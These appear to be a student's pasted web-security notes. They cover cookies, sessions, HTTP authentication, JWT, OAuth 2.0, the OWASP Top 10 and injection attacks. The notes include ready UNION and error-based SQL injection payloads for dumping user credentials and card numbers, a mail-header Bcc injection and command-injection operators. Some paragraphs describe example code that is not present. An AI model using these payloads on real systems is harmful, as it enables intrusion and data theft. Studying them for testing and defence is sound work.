· 6 years ago · Mar 18, 2020, 06:24 AM
notes

Session management:

Example: when you add an item to a cart, the connection has to be kept stateful (the server has to remember the cart between requests).

A web session is a sequence of network HTTP request and response transactions associated with the same user.

A session is a semi-permanent interactive exchange: it is set up at some point in time and dropped or torn down at some later point. (The session data itself is stored on the server.)

A session is typically, but not always, stateful, meaning that at least one of the two parties needs to save information about the history of the exchange in order to communicate.

A website may start a session when a user visits the site for the first time; from that point onwards everything the user does is done within the context of the established session.

At some point the user may decide to authenticate to get extra functionality; once finished they log out, finally choosing to terminate the session altogether.

Where is the session id stored and how is it saved?

Cookie jar, local storage, or memory.

The HTTP protocol is stateless, so to handle sessions we need to smuggle some state into the protocol. Usually it is added as a header or a cookie, and the session may have some data associated with it which needs to be stored by one of the parties.

There are two types of session id tokens:

1. opaque (carries no data itself)
2. self-describing

The token given to the user may be opaque or self-describing. An opaque token in itself holds no information; it is only used as a key to fetch the essential data server side.

_________________________
type: opaque
sample: a random string
data: none in the token; looked up server side by the token
______________________________
type: self-describing
sample: an encoded, signed payload
data: exp: 120 | user id: 3
_______________________________

On the other hand, the self-describing session id is just what its name suggests: it holds the data within the token itself.

An opaque token is a random value with enough entropy to resist brute-force guessing, while a self-describing token is base64-encoded and signed to protect its integrity (signed, not encrypted: anyone holding it can read the data). Building on the idea of the self-describing token we can construct a so-called stateless session.
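An added example (not from the original notes) of the opaque variant: a minimal server-side session store in which the id is a random key and all state lives on the server. The TTL of 120 seconds mirrors the exp:120 above; the clock argument is an assumption made so expiry can be exercised without waiting.

```python
import hashlib
import secrets
import time

# Added example, not from the original notes: a minimal server-side store for
# opaque session ids. The id carries no data; the server keeps the state.
SESSION_TTL = 120   # seconds, echoing the exp:120 in the notes above

def _key(token):
    # Store only a hash of the id: a leaked session table cannot be replayed.
    return hashlib.sha256(token.encode()).hexdigest()

class SessionStore:
    def __init__(self, ttl=SESSION_TTL, clock=time.time):
        self._sessions = {}   # sha256(token) -> session data
        self._ttl = ttl
        self._clock = clock   # injectable so expiry can be tested

    def create(self, user_id):
        # 32 random bytes = 256 bits of entropy, 43 URL-safe characters
        token = secrets.token_urlsafe(32)
        self._sessions[_key(token)] = {"user_id": user_id,
                                       "expires": self._clock() + self._ttl}
        return token

    def lookup(self, token):
        data = self._sessions.get(_key(token))
        if data is None:
            return None
        if data["expires"] <= self._clock():
            del self._sessions[_key(token)]   # lazy expiry
            return None
        return data

    def rotate(self, token):
        """Issue a fresh id for the same state, e.g. right after login, so an
        id planted by an attacker before login never becomes a logged-in one."""
        data = self.lookup(token)
        if data is None:
            return None
        self.destroy(token)
        return self.create(data["user_id"])

    def destroy(self, token):
        self._sessions.pop(_key(token), None)

    def __len__(self):
        return len(self._sessions)
```

The server never compares the raw token with anything: hashing it first means a dump of the session table gives an attacker nothing usable, and rotate() is the standard defence against session fixation when the user authenticates mid-session.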

HTTP cookie

An HTTP cookie is a small piece of data that the server sends to the browser; the browser may store it and send it back to the same server with later requests. Typically it is used to tell whether two requests came from the same browser.

It remembers stateful information for the stateless HTTP protocol. Cookies are used for three purposes: session management, personalisation and tracking.

1. session management: logins, shopping carts, game scores, or anything else the server should remember

2. personalisation: user preferences, themes

3. tracking: recording and analyzing user behaviour (the Cambridge Analytica case)

Creating cookies: from page JavaScript, by assigning to document.cookie; from the server, with a Set-Cookie response header.

document.cookie = "username=john"

When receiving an HTTP request, the server can send a Set-Cookie header with the response. The cookie is usually stored by the browser and then sent back with later requests inside the Cookie HTTP header. An expiration date or duration can be specified, after which the cookie is no longer sent.

Additionally, the cookie can be restricted to a specific domain and path, which control where the cookie is sent.

The Set-Cookie HTTP response header sends cookies from the server to the user agent:

Set-Cookie: tasty_cookie=strawberry

Several cookies in one response (one Set-Cookie header per cookie):

HTTP/2.0 200 OK
Content-Type: text/html
Set-Cookie: yum=hello
Set-Cookie: hello=yum

Session cookie: the browser sends its stored cookies back in the Cookie request header:

GET /sample_page.html HTTP/2.0
Host: www.example.org
Cookie: yummy_cookie=choco; tasty_cookie=strawberry

The cookies created above are session cookies: they are deleted when the client shuts down because they did not specify an Expires or Max-Age directive. However, web browsers may use session restoring, which makes most session cookies permanent, as if the browser was never closed.

Permanent cookies: instead of expiring when the client closes, permanent cookies expire at a specific date (Expires) or after a specific length of time (Max-Age):

Set-Cookie: id=a3wal; Expires=Wed, 21 Oct 2015 07:28:00 GMT

Secure and HttpOnly cookies:

A cookie with the Secure attribute is only sent to the server within an encrypted request over HTTPS. Even with the Secure directive, sensitive information should never be stored in cookies: the cookie mechanism gives no confidentiality on the client, so Secure only stops exposure on the wire.

To help mitigate XSS attacks, HttpOnly cookies are inaccessible to the JavaScript document.cookie API; they are only sent to the server. For example, cookies that persist server-side sessions do not need to be available to JavaScript, and the HttpOnly flag should be set on them.

Scope of cookies:

The Domain and Path directives define the scope of a cookie: which URLs the cookie should be sent to.

Domain specifies the allowed hosts to receive the cookie. If unspecified, it defaults to the host of the current document location, excluding subdomains. If Domain is specified, then subdomains are always included.

Attack surface: a cookie scoped to the parent domain is sent to, and can be overwritten from, every subdomain, so one compromised subdomain affects all of them.

Example: if Domain=mozilla.org is set, then cookies are sent to mozilla.org and its subdomains (such as developer.mozilla.org).

Path: indicates a URL path that must exist in the requested URL in order for the Cookie header to be sent.

The %x2F (/) character is treated as a directory separator, so subdirectories match as well. For example, Path=/docs matches all of:

/docs
/docs/web
/docs/web/http

SameSite cookies: lets servers require that a cookie not be sent with cross-site requests, which provides some protection against CSRF attacks.

The SameSite attribute can have three values: None, Lax, Strict.

None: the browser will send the cookie with both cross-site and same-site requests.
Strict: the browser will only send the cookie for same-site requests (requests originating from the site that set the cookie). If the request originated from a different site than the current location, no cookie with the Strict attribute will be included.
Lax: same-site cookies are withheld on cross-site subrequests, for example calls to load images or frames, but are sent when the user navigates to the URL from an external site by following a link.

Browsers are migrating to treating cookies without a SameSite attribute as SameSite=Lax.

If the cookie needs to be sent cross-site, opt out of the SameSite restriction using SameSite=None; None must be used together with the Secure attribute, otherwise the browser rejects the cookie.

Cookie prefixes: the design of the cookie mechanism is such that a server is unable to confirm whether a cookie was set on a secure origin, or even where a cookie was originally set.

Two prefixes:

__Host-

__Secure-

__Secure-: a cookie whose name has this prefix is only accepted in a Set-Cookie directive if it is marked Secure and was sent from a secure origin.

__Host-: a cookie whose name has this prefix is only accepted if it is marked Secure, was sent from a secure origin, does not include a Domain attribute, and has its Path attribute set to /. In this way these cookies can be seen as domain-locked.

(session vs cookie)

Session: can store any type of data, because the stored value is an object on the server.

Sessions are stored on the server: the client only ever holds the session id, never the data, so the data cannot be read or tampered with by the client. A session is independent and individual for every client. There is no limit on the size or number of sessions an application can use, the client cannot disable sessions, and sessions can be used without cookies (for example by carrying the id in the URL, which is discouraged because it leaks through logs and the Referer header). The disadvantage of sessions is that they are a burden / overhead on the server.

Session cookies are called non-persistent cookies: their lifetime ends when the browser closes unless a lifetime is set manually.

Cookies: can only store string data; they are stored at the client side. Cookies are not secret, since they are stored in text format on the client, and they are not trustworthy unless the server signs them. A cookie may or may not be individual to a client.

The size of a cookie is limited to about 4 KB (RFC 6265 requires browsers to support at least 4096 bytes per cookie) and browsers cap the number per domain (at least 50 per domain is required).

Cookies can be disabled by the user. Since the value is a plain string there is no built-in security. We have persistent and non-persistent cookies.
Authentication means confirming your own identity.

Authorization means being allowed access to a system/resource.

Cookies make HTTP stateful.

Authentication

verifies that you are who you say you are

methods

a) login forms
b) HTTP Basic authentication
c) HTTP Digest authentication
d) X.509 certificates
e) custom authentication methods

Authorization

decides if you have permission to access a resource

methods
a) access controls for URLs
b) secured objects and methods
c) access control lists

Types of HTTP authentication covered below:

1. HTTP Basic authentication
2. form-based authentication
3. HTTP Digest access authentication
4. Bearer authentication
5. HTTP Origin-Bound Authentication (HOBA)
6. mutual authentication

This is theory; how do you use it in practice?

When you are pentesting a website you can tell which type of authentication it is using: a WWW-Authenticate: Basic or Digest challenge, a login form, an Authorization: Bearer header, or a client certificate prompt.

HTTP Basic authentication is a simple technique for enforcing access controls to web resources. It uses standard fields in the HTTP header, removing the need for a handshake, and does not require cookies or session identifiers.

With Basic authentication the server can store the password in whatever hashed form it wants (this is the developer's perspective). On the wire it sends the username and password base64-encoded, which is an encoding, not encryption.

If the transmission is intercepted, the credentials can trivially be decoded.

Form-based authentication

Allows developers to control the look and feel of the login screens by customizing the login and error pages that the browser presents to the user. The form content is sent in plaintext, just like Basic authentication; this can expose usernames and passwords unless the connection is secured with TLS (SSL).

4 steps:

1. the client requests access to a protected resource

2. if the client is unauthenticated, the server redirects the user to the login page

3. the client submits the login form to the server

4. the server attempts to authenticate the user

Bearer authentication

Is the token-based scheme used in OAuth 2.0 to access protected resources. A bearer token is an opaque string that only the server needs to understand; whoever holds it can use it, hence "bearer". It can be a short string of hexadecimal characters or a more structured token such as a JSON Web Token (JWT).
____________________________________________________
HTTP Digest authentication:

Digest access authentication uses MD5 hashing to ensure that no username, password, HTTP method or requested URI is sent in plain text. Although Digest keeps the password off the wire, it is hashing rather than encryption, and it is still vulnerable to man-in-the-middle attacks: the server is not authenticated, and a captured exchange can be cracked offline.

// homework: read up on why MD5 hashing is considered insecure

Process:

step 1: the client sends a request to a server

step 2: the server responds with a special value called a nonce (number used once) and a string representing the realm, and asks the client to authenticate

step 3: the client responds with the nonce and a hash of the username, realm and password, combined with the nonce, method and URI

step 4: the server recomputes the same hash from its own copy of the credentials and, if it matches, responds to the request with the requested information
__________________________________________
HOBA - HTTP Origin-Bound Authentication (RFC 7486)

Is a digital-signature-based design for HTTP authentication. It can be used natively by the HTTP client or via a JavaScript-based implementation embedded in HTML.

// binance.com: when you enter your username and password there, they go across in encrypted form

It is an alternative to HTTP authentication schemes that require passwords, using digital signatures as the authentication mechanism. The client creates a new public/private key pair for each host it authenticates to; the keys are used in HOBA for HTTP clients to authenticate themselves to servers, either natively or in a JavaScript authentication program. The keys are not stored in public key certificates but as a bare SubjectPublicKeyInfo structure (part of PKIX, RFC 5280).
__________________________________

Mutual authentication is a process/technology where both entities authenticate each other.

For example: the client authenticates the server and vice versa by exchanging certificates (mutual TLS).

RFC 7519 - JWT (JSON Web Token)

Session-based authentication:

Browser                                                      Server
   |  POST /user/login  body(username, password)               |
   | --------------------------------------------------------> |
   |                                                           |  creates a session, stores it server side
   |  Set-Cookie: session id                                   |
   | <-------------------------------------------------------- |
   |  authenticated request with Cookie: session id            |
   | --------------------------------------------------------> |
   |                                                           |  looks up the session by id
   |  response                                                 |
   | <-------------------------------------------------------- |

Token-based authentication (JWT):

Browser                                                      Server
   |  POST /user/login  body(username, password)               |
   | --------------------------------------------------------> |
   |                                                           |  creates a JWT signed with the secret
   |  sends JWT to browser                                     |
   | <-------------------------------------------------------- |
   |  authenticated request with JWT in the Authorization header |
   | --------------------------------------------------------> |
   |                                                           |  checks the JWT signature, reads user info from it
   |  response                                                 |
   | <-------------------------------------------------------- |

**session vs token based authentication:
------------------------------------------------

HTTP is stateless; however, there are times when the server needs to remember state.

For example: in an online shop, after we put a product in our shopping cart we do not want the product to disappear when we go to another page to buy another product, i.e. we want our purchases to be remembered while we browse around the online shop.

Session-based authentication: in session-based authentication the server creates a session for the user after the user logs in.

The session id is then stored in a cookie in the user's browser; while the user stays logged in, "the cookie is sent along with every subsequent request".

The server can then compare the session id from the cookie against the session information stored in memory (on the server) to verify the user's identity and send a response with the corresponding state.

{the diagram drawn earlier; it will definitely come in the exam paper}

Token-based authentication: many web applications use JWTs instead of sessions for authentication. In a token-based application the server creates a JWT with a secret and sends the JWT to the client; the client stores the JWT (usually in local storage) and includes the JWT in the header with every request.

The server then validates the JWT with every request from the client and sends the response.

(diagram number 2, the JWT one)

The crux: the biggest difference is that the user's state is not stored on the server, as the state is stored inside the token on the client side.

Many modern web applications use JWTs for authentication (for reasons including scalability and mobile device authentication).

jsonwebtoken library: use this to create tokens.

express-jwt: use this to validate them.

Scalability:

session-based authentication: because sessions are stored in the server's memory, scaling becomes an issue when a large number of users use the server at once
token-based authentication: no issue with scaling, as the token is stored on the client side

Multiple devices:

session-based authentication: cookies normally work on one single domain or its subdomains, and they are normally disabled by the browser if they work cross-domain (third-party cookies); this poses issues when APIs are served from a different domain to mobile and web clients
token-based authentication: no issue, as the JWT is included in the request header

-------------------------------------------------------------------------------------------------------------------------------------------------------

Token-based authentication using JWT is the more recommended method in modern web applications. One drawback of JWT is that its size is much bigger compared with a session id stored in a cookie, because the JWT contains more user information.

Care must be taken to ensure only the necessary information is included in the JWT, and sensitive information should be omitted, since the payload is readable by anyone holding the token. Storing the JWT in local storage also makes it readable by any XSS on the page, which an HttpOnly cookie would prevent.

JWT tokens
________________

It is an open standard (RFC 7519).

It is used to securely transfer information between two parties.

It is digitally signed (the information is signed and trusted; any alteration of the data is detected when the signature is checked).

It is compact: JWTs can be sent via URL, POST request body or HTTP header.

It is fast to validate (a signature check, no database lookup).

It is a self-contained token (the token itself contains the information about the user).

It is used for authentication.

What does it look like?

aaaaaaa.bbbbbbbbb.cccc

aaaaaaa represents the header

bbbbbbbbb represents the payload

cccc represents the signature

The header is base64url-encoded to make the first part.

The header contains the algorithm and the token type:

header

{
  "alg": "HS256",
  "typ": "JWT"
}

payload

{
  "sub": "123213213",
  "name": "johnfoe",
  "iat": 1232132132
}

It contains user data and metadata such as the expiry date of the token (exp, seconds since the epoch like iat) or whether the user is an admin. It is only encoded, not encrypted: anyone holding the token can read it.

The payload is base64url-encoded to form the second part.

Signature

The signature is computed over the first two parts, so the receiver can check which key issued the token and that the header and payload are exactly what was signed.

It also ensures that the data does not change in transit from one party to another.

HMACSHA256(
  base64UrlEncode(header) + "." +
  base64UrlEncode(payload),
  your-256-bit-secret
)

OWASP Top 10 2017
-------------------------------------

SQL injection, step 1: break the query by finding the input parameter

step 2: fuzz the parameter to get an error

step 3: see if you can see the backend error on the frontend; if so, you can get relevant data out by sending in SQL queries

step 4: find out the number of columns using ORDER BY; we need this so that the UNION SELECT works (both sides of a UNION must have the same column count)

step 5: find out the vulnerable columns, i.e. the ones whose data is displayed on the frontend; those are the ones that reflect our output

Then put the extraction in the displayed column and pad the rest with the remaining column numbers:

union select table_name, <remaining column numbers> from information_schema.tables

union select column_name, <remaining column numbers> from information_schema.columns where table_name = 'users'

union select group_concat(uname,":",pass,":",cc), <remaining column numbers> from users
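Steps 4 and 5 carried out end to end, as an added example that is not from the original notes: a constructed in-memory SQLite database with a products table that is queried through a concatenated string, the ORDER BY column count probe, UNION SELECT through the reflected column, and the parameterised query that stops all of it. SQLite stands in for MySQL, so sqlite_master plays the role of information_schema.tables and || replaces concat(); the technique is the same.

```python
import sqlite3

# Added example, not from the original notes: the steps above run against an
# in-memory SQLite database built here. sqlite_master plays the role of
# information_schema.tables and || replaces concat(); the method is the same.

def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price TEXT);
        CREATE TABLE users(uname TEXT, pass TEXT, cc TEXT);
        INSERT INTO products VALUES (1, 'pen', '10'), (2, 'book', '50');
        INSERT INTO users VALUES ('mayank', 'hunter2', '4111-1111-1111-1111');
    """)
    return db

def product_lookup_vulnerable(db, product_id):
    # Step 1: the parameter is pasted into the query, so it can break it.
    sql = f"SELECT id, name, price FROM products WHERE id = {product_id}"
    return db.execute(sql).fetchall()

def product_lookup_safe(db, product_id):
    # Placeholder: the value is bound as data and never parsed as SQL.
    return db.execute("SELECT id, name, price FROM products WHERE id = ?",
                      (product_id,)).fetchall()

def count_columns(db, lookup, max_cols=10):
    """Step 4: ORDER BY n works while n <= number of columns, then errors.
    Returns None when no n errors, i.e. the parameter is not injectable."""
    for n in range(1, max_cols + 1):
        try:
            lookup(db, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None

def list_tables(db, lookup):
    # Step 5: column 2 (name) is reflected on the page, so extract through it.
    payload = "0 UNION SELECT 1, name, 3 FROM sqlite_master WHERE type='table'"
    return sorted(row[1] for row in lookup(db, payload))

def dump_users(db, lookup):
    # group_concat squeezes every row into the one reflected cell.
    payload = ("0 UNION SELECT 1, group_concat(uname || ':' || pass || ':' || cc), 3 "
               "FROM users")
    return [row[1] for row in lookup(db, payload)]
```

Against the safe lookup the same payloads are compared with the id column as literal text: no rows come back and nothing errors, which is exactly what the tester sees when ORDER BY probing never produces an error.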

SMTP injection aka mail header injection

A contact form submission where the bcc parameter is the injected part:

Name=Mayank&email=mayank.betch18@gmailcom&bcc=attacker@gmial.com&remarks=how+are+you&form=submit
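How a form field turns into an extra mail header, as an added example that is not from the original notes: the vulnerable builder pastes the sender field into header lines, so a CR/LF inside it starts a new Bcc header; the safe builder refuses line breaks in any header field. Addresses and the contact form layout are constructed for this example, and the message is parsed with the standard library rather than sent.

```python
import re
from email.parser import Parser

# Added example, not from the original notes: a CR/LF in a contact form field
# becomes an extra mail header, and the check that blocks it. Addresses are
# constructed; nothing is actually sent.

def build_message_vulnerable(name, sender, remarks):
    # User input is pasted straight into header lines.
    return (f"From: {sender}\r\n"
            f"Reply-To: {sender}\r\n"
            f"To: support@example.org\r\n"
            f"Subject: Contact form message from {name}\r\n"
            f"\r\n{remarks}\r\n")

_LINE_BREAK = re.compile(r"[\r\n]")

def build_message_safe(name, sender, remarks):
    # Header values may never contain line breaks; the body may.
    for field in (name, sender):
        if _LINE_BREAK.search(field):
            raise ValueError("line break in header field")
    return build_message_vulnerable(name, sender, remarks)

def recipients(raw_message):
    """Who the MTA would actually deliver to: To, Cc and Bcc headers."""
    msg = Parser().parsestr(raw_message)
    return [msg[h] for h in ("To", "Cc", "Bcc") if msg[h] is not None]

def injection_blocked(name, sender, remarks):
    try:
        build_message_safe(name, sender, remarks)
        return False
    except ValueError:
        return True
```

The check is deliberately on the header fields only: a multi-line remarks body is legitimate, and rejecting it would break the form without adding any protection.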

Error based

select rand(): returns a float between 0 and 1 (0 inclusive, 1 exclusive), for example 0.343432432

floor returns the smaller number, rounding down

ceiling returns the larger number, rounding up

select floor(rand()*2)   -- gives 0 or 1

select floor(rand()*2) title_name_if_you_want   -- alias for the column

select table_name from information_schema.tables

select version() from information_schema.tables
--------------------
double query
------------------------

select database()   -- single query

select (select database())

because whatever we write inside brackets is treated as a separate entity (a subquery)

select concat(0x3a,0x3a,(select database()),0x3a,0x3a) from information_schema.tables

select concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2)) from information_schema.tables

select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a

Why this errors: MySQL evaluates rand() again while building the GROUP BY temporary table, so the same key can be inserted twice and MySQL raises "Duplicate entry '::dbname::1' for key 'group_key'", leaking the subquery result (0x3a is ':') inside the error message. Replace (select database()) with any other single-row subquery to read it out the same way.

----------------------------------------------------------------------------------
Harshit sir's notes
------------------------

OWASP Top 10 2017
--------------------

A1:2017-Injection

Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

A2:2017-Broken Authentication

Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities temporarily or permanently.

A3:2017-Sensitive Data Exposure

Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.

A4:2017-XML External Entities (XXE)

Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.

A5:2017-Broken Access Control

Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users' data, change access rights, etc.

A6:2017-Security Misconfiguration

Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.

A7:2017-Cross-Site Scripting (XSS)

XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

A8:2017-Insecure Deserialization

Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.

A9:2017-Using Components with Known Vulnerabilities

Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.

A10:2017-Insufficient Logging & Monitoring

Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.

622
623--------------------------------------------------------------------------------------------------------------------------------------------------------
624
625 INJECTIONS
626
627 OS COMMAND INJECTION
628
629 SQL INJECTION
630
631 SMTP INJECTION
632
633 XPATH INJECTION
634
635 SSI INJECTION (SERVER SIDE INCLUDES)
636
637 HTML INJECTION
638
639 LDAP
640
641AUTHENTICATIOM CONTROLS
642
643* AUTHENTICATION BYPASS THROUGH RESPONSE TAMPERING
644
645* EXECUTION AFTER REDIRECT (EAR)
646
647* OTP RETURNED IN RESPONSE
648
649* THROUGH RESPONSE MODIFICATION
650
651* OTP COLLISON ATTACK
652
653* LACK OF OTP BINDING WITH USER ID
654
655* LACK OF OTP BRUTEFORCE PREVENTION
656
657* LACK OF PASSWORD BRUTEFORCE PREVENTION
658
659* LACK OF PASSWORD BRUTEFORCE PREVENTION
660
661* MISSING TWO FACTOR AUTHENTICATION FOR PAYMENTS
662
663* MISSING FORCED AUTHENTICATION
664
665
666
OAuth is an open standard authorization framework for token-based authorization on the internet.

OAuth, pronounced "oh-auth", enables an end user's account information to be used by third-party services, such as Facebook and Google, without exposing the user's credentials to the third party.

It acts as an intermediary on behalf of the end user, providing the third party with an access token that authorizes specific account information to be shared.

The process for obtaining the token is called the authorization flow.

OAuth 1.0 was first released in 2007 for the Twitter API.

In 2010 the IETF (Internet Engineering Task Force) formed the OAuth working group, which published the first draft of OAuth 2.0.

OAuth 2.0 added a new authorization code flow to accommodate mobile applications, simplified signatures, and short-lived tokens with long-lived authorization (via refresh tokens).

HOW DOES OAUTH 2.0 WORK?

It is a six step process (using the example of a calendar application that wants to use the user's images stored in Google Drive):

1. the calendar creation application (the client) requests authorization to access protected resources, in this case image files owned by the user, by directing the user to the authorization server's authorize endpoint

2. the resource owner (the user) authenticates and authorizes the resource access request from the application, and the authorize endpoint returns an authorization grant to the client. Grant types in common use are authorization code, client credentials, device code and refresh token (RFC 6749 itself defines authorization code, implicit, resource owner password credentials and client credentials; the device code grant is RFC 8628)

3. the client then requests an access token from the authorization server by presenting the authorization grant returned from the authorize endpoint, along with authentication of its own identity (client id and client secret)

4. if the client identity is authenticated and the authorization grant is valid, the authorization server (the authentication provider, Google's authorization server in this instance) issues an access token to the client

5. the client can now request the protected resources from the resource server (Google Drive in this example) by presenting the access token as a bearer token

6. if the access token is valid, the resource server returns the requested resources to the calendar creation application (the client)
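The six steps above with all three parties in one process, as an added example that is not from the original notes and not any real provider's code: the authorization server issues a short-lived, single-use code bound to the client and redirect URI, exchanges it for a bearer token only after authenticating the client, and the resource server serves images only for a valid token with the right scope. The client name, user, scope string and image files are constructed; the state parameter check on the callback is included because without it the callback can be driven by an attacker's code.

```python
import hmac
import secrets
import time
from urllib.parse import parse_qs, urlsplit

# Added example, not from the original notes and not any provider's real code:
# the six-step authorization code flow with all three parties in one process.

class AuthorizationServer:
    def __init__(self, clock=time.time):
        self.clients = {}   # client_id -> {"secret", "redirect_uri"}
        self._codes = {}    # code -> grant, single use, short lived
        self._tokens = {}   # access_token -> {"sub", "scope", "exp"}
        self._clock = clock

    def register_client(self, client_id, secret, redirect_uri):
        self.clients[client_id] = {"secret": secret, "redirect_uri": redirect_uri}

    def authorize(self, client_id, redirect_uri, scope, state, user):
        """Steps 1-2: the user has logged in and consented; redirect back."""
        client = self.clients.get(client_id)
        if client is None or client["redirect_uri"] != redirect_uri:
            raise ValueError("unknown client or redirect_uri mismatch")
        code = secrets.token_urlsafe(24)
        self._codes[code] = {"client_id": client_id, "redirect_uri": redirect_uri,
                             "scope": scope, "sub": user, "exp": self._clock() + 60}
        return f"{redirect_uri}?code={code}&state={state}"

    def token(self, client_id, client_secret, code, redirect_uri):
        """Steps 3-4: authenticate the client, check the grant, issue a token."""
        client = self.clients.get(client_id)
        if client is None or not hmac.compare_digest(client["secret"], client_secret):
            raise PermissionError("invalid_client")
        grant = self._codes.pop(code, None)          # a code is usable once
        if (grant is None or grant["client_id"] != client_id
                or grant["redirect_uri"] != redirect_uri
                or self._clock() > grant["exp"]):
            raise PermissionError("invalid_grant")
        token = secrets.token_urlsafe(32)
        self._tokens[token] = {"sub": grant["sub"], "scope": grant["scope"],
                               "exp": self._clock() + 3600}
        return {"access_token": token, "token_type": "Bearer",
                "expires_in": 3600, "scope": grant["scope"]}

    def introspect(self, token):
        info = self._tokens.get(token)
        return None if info is None or self._clock() > info["exp"] else info

class ResourceServer:
    """Steps 5-6: the image store; it trusts nothing but a valid bearer token."""
    def __init__(self, auth_server):
        self.auth = auth_server
        self.images = {"alice": ["holiday.jpg", "cat.png"]}   # constructed data

    def list_images(self, authorization):
        scheme, _, token = authorization.partition(" ")
        info = self.auth.introspect(token) if scheme == "Bearer" else None
        if info is None or "images:read" not in info["scope"].split():
            raise PermissionError("invalid_token")
        return self.images.get(info["sub"], [])

class CalendarApp:
    """The client: remembers its state nonce and checks it on the callback."""
    def __init__(self, auth_server, client_id, secret, redirect_uri):
        self.auth, self.client_id = auth_server, client_id
        self.secret, self.redirect_uri = secret, redirect_uri
        self._pending_state = None

    def start(self, user):
        self._pending_state = secrets.token_urlsafe(16)
        return self.auth.authorize(self.client_id, self.redirect_uri,
                                   "images:read", self._pending_state, user)

    def callback(self, redirect_url):
        query = parse_qs(urlsplit(redirect_url).query)
        if query.get("state", [None])[0] != self._pending_state:
            raise PermissionError("state mismatch: callback not started by us")
        return self.auth.token(self.client_id, self.secret,
                               query["code"][0], self.redirect_uri)

def denied(fn, *args):
    try:
        fn(*args)
        return False
    except (PermissionError, ValueError):
        return True

def run_flow():
    auth = AuthorizationServer()
    auth.register_client("calendar-app", "client-secret", "https://cal.example/cb")
    store = ResourceServer(auth)
    app = CalendarApp(auth, "calendar-app", "client-secret", "https://cal.example/cb")
    redirect = app.start("alice")
    grant = app.callback(redirect)
    images = store.list_images(f"Bearer {grant['access_token']}")
    return images, not denied(app.callback, redirect)   # replaying the code fails
```

In a real deployment the user's login and consent happen inside authorize() at the authorization server's own origin, so the client never sees the password, which is the whole point of the flow; the redirect_uri comparison and the single-use code are what stop a stolen or guessed code from being cashed in by somebody else.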
698
699 INJECTIONS:
700
701 injection flaw such as sql, nosql,os ,and ldap injection occur whrn untrusted adata iss sent to an interpereter as pasrt of command or query the attackers hostile adata can trick the intereprerter into executing unintented commnands ot accessing data without proper authorization
702
703
An injection vulnerability exists when an attacker is able to inject malicious queries, scripts or commands into some interpreter through an input parameter of the website and get sensitive data (or code execution) in return.

OS COMMAND INJECTION - an attack whose goal is the execution of arbitrary commands on the host OS via a vulnerable application. Command injection is possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers) to a system shell. If an input parameter is passed to the command shell, chaining it with shell operators such as `;`, `&&`, `||` and `|` (or a `sleep` delay, for the blind case where output is not echoed) reveals the injection.

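Added example (not from the notes): the same host lookup done the vulnerable way, a string handed to a shell, and the safe way, an argument vector with no shell plus an allow-list. `echo` stands in for the real network tool so it runs offline on any POSIX system; the hostname pattern `HOST_RE` and the payload are assumptions for the demo.

```python
import re
import subprocess

# Assumed input policy: only hostnames / dotted IPv4 addresses are expected.
HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")

# Constructed attacker input: a valid-looking host followed by a second command.
PAYLOAD = "example.com; echo INJECTED"


def lookup_vulnerable(host):
    # shell=True hands the whole string to /bin/sh, so `;`, `&&`, `||`, `|`
    # and `$(...)` inside `host` are parsed as shell syntax: the injection point.
    return subprocess.run("echo resolving " + host, shell=True,
                          capture_output=True, text=True).stdout


def lookup_argv_only(host):
    # Argument vector, no shell: `host` is a single argv element and the
    # metacharacters reach the program literally, never a shell.
    return subprocess.run(["echo", "resolving", host],
                          capture_output=True, text=True).stdout


def lookup_safe(host):
    # Defence in depth: allow-list the value as well, so a malformed host never
    # reaches the tool at all (some tools have their own option parsing).
    if not HOST_RE.fullmatch(host):
        raise ValueError("invalid hostname")
    return lookup_argv_only(host)


def demo():
    """Return (lines the shell printed for the payload, whether lookup_safe refused it)."""
    lines = lookup_vulnerable(PAYLOAD).splitlines()
    try:
        lookup_safe(PAYLOAD)
        refused = False
    except ValueError:
        refused = True
    return lines, refused
```

With the vulnerable version the second line of output ("INJECTED") is the tell a tester looks for; against a target that does not echo output the same probe is done with `; sleep 5` and a stopwatch.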
SQL INJECTION - a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. Variants: UNION-based, error-based (double query) and blind (time-based, boolean-based). The attacker injects SQL through the front end of the website and reads data back from the backend database.

